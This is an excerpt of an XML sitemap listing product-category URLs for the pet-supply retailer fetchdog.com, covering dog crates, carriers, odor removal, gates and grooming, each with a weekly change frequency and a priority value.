<url> <loc>http://www.fetchdog.com/pet-supplies/dogcrates-carriers/alldogcrates-carriers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcrates-carriers/dogcrates-pens/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogcrates-carriers/dogcarriers/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogwaste-odor/alldogwaste-odor/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogwaste-odor/dogpoop-urineremoval/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogwaste-odor/dog-odorstain-removal/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dogwaste-odor/doglawntreatments/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/doggates/alldoggates/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/doggates/freestandingdoggates/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/doggates/extrawidetall-doggates/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/doggates/car-dog-gates/</loc> <changefreq>weekly</changefreq> <priority>0.6</priority> </url> <url> <loc>http://www.fetchdog.com/pet-supplies/dog-groomingsupplies/alldog-groomin..